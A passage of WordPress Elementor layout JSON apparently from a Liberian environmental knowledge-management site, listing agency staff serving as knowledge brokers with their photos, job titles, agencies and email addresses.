\\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a 